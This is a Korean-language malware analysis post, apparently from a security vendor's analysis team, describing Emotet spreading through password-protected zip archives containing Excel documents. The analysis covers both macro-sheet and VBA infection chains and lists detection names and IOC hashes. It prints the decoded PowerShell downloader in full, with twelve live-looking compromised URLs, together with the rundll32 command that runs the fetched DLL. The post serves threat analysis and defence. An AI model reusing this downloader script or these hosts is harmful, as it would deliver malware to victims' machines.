엑셀 문서를 통해 Emotet 악성코드 국내 유포 중

ASEC 분석팀은 최근 Emotet 악성코드를 다운로드하는 악성 엑셀 문서가 활발히 유포되고 있음을 확인하였다. 지난달 ‘엑셀 파일을 통해 유포 중인 Emotet 악성코드’를 통해 해당 유형의 악성코드에 대해 소개하였다. 당시에는 매크로 시트를 활용한 유형의 엑셀 문서만 확인되었지만, 최근에는 VBA 매크로를 이용하여 악성 행위를 수행하는 유형도 추가되었다.

유포 메일에는 암호가 설정된 압축 파일이 첨부되어 있으며, 압축 파일 내부에는 엑셀 문서가 존재한다.

그림1. 유포 이메일1
그림2. 유포 이메일2
그림3. 압축파일에 포함된 엑셀 문서

Scan_2456321.xlsx 파일의 경우 이전과 동일하게 Auto_Open으로 설정되어 있는 셀의 수식을 통해 악성 명령어를 실행한다.

그림4. Scan_2456321.xlsx 파일

숨겨진 시트에는 [그림 5]와 같은 수식이 존재하여 사용자가 콘텐츠 허용 버튼 클릭 시 추가 파일을 다운로드 하는 수식이 생성된다.

그림5. Scan_2456321.xlsx에 존재하는 수식

추가로 생성되는 수식은 아래와 같다. 이후 해당 수식이 실행되어 특정 주소로부터 Emotet 악성코드를 다운로드하여 iix.ocx로 저장 및 실행한다.

그림6. 생성된 추가 수식

또 다른 엑셀 문서인 4968839233806560.xls 파일은 위 엑셀 문서와 달리 내부에 VBA 매크로를 포함하고 있다. 다만, 엑셀 문서 내부에는 위와 동일한 이미지를 포함하여 매크로 실행을 유도하고 있다.

그림7. 4968839233806560.xls에 포함된 이미지

해당 엑셀 문서는 VBAProject에 암호가 설정되어 있어 매크로 코드가 숨겨져 있다.

그림8. 암호가 설정된 VBAProject

암호 해제 시 다음과 같이 VBA 매크로를 확인할 수 있다. 해당 매크로에는 Workbook_Open() 함수를 통해 사용자가 콘텐츠 사용 버튼 클릭 시 악성 매크로 코드가 자동으로 실행될 수 있도록 하였다.

그림9. VBA 매크로 코드

매크로 실행 시 programdata 폴더에 wetidjks.vbs와 jledshf.bat를 생성한 후 wetidjks.vbs 파일을 실행한다.

wetidjks.vbs 는 난독화되어 있으며, 실행 시 jledshf.bat를 실행하고 다운로드된 Emotet 악성코드를 실행할 수 있도록 아래의 명령을 수행한다.

  • cmd /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

jledshf.bat 에는 base64로 인코딩 된 파워쉘 명령어가 존재하여 실행 시 파워쉘을 통해 아래에 존재하는 주소로부터 Emotet 악성코드를 다운로드 및 programdata 폴더에 vbkwk.dll 로 저장한다.

powershell –enc $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");
fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){
	$Js3hlskdcfk="vbkwk";
	$sdewHSw3gkjsd=Get-Random;
	$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";
	iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;
	if(test-pAtH $IDrfghsbzkjxd){
		if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}
	}
}

엑셀 문서를 통해 다운로드 된 Emotet 악성코드는 실행 시 내부에 존재하는 다수의 C&C 서버 주소로 접속을 시도하며, 접속에 성공할 시 공격자로부터 명령을 받아 추가 악성코드 다운로드 등의 악성 행위를 수행할 수 있다.

최근 Emotet 악성코드를 다운로드하는 엑셀 문서의 유포가 활발히 이루어지고 있으며, 악성코드 다운로드에 사용되는 방식 역시 다양하여 사용자의 주의가 요구된다. 늘 강조하듯이 발신인을 알 수 없는 메일의 첨부파일이나 출처를 알 수 없는 파일의 실행을 자제해야한다. 또한, 매크로 실행을 제한하여 악성 매크로가 자동으로 실행되지 않도록 주의해야한다.

 V3 에서는 파일진단 뿐 아니라 아래와 같이 행위탐지도 가능하다.

[파일 진단]
Trojan/XLS.PsExec
Trojan/XLS.Agent
Trojan/Win.Emotet

[행위진단]
Execution/MDP.Rundll.M4179
Execution/MDP.Powershell.M4201

[IOC 정보]
8b7a08559eec18b8ccabe70289e67b94
c4f65501d52cbfa5d454d06309545720
c52358a4a8d0b09e98382e5ba4a143a4
c2de652b094b538070e754ee09f3c737

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

5 2 votes
별점 주기
guest
1 댓글
Inline Feedbacks
View all comments
trackback

[…] 엑셀 문서를 통해 Emotet 악성코드 국내 유포 중 […]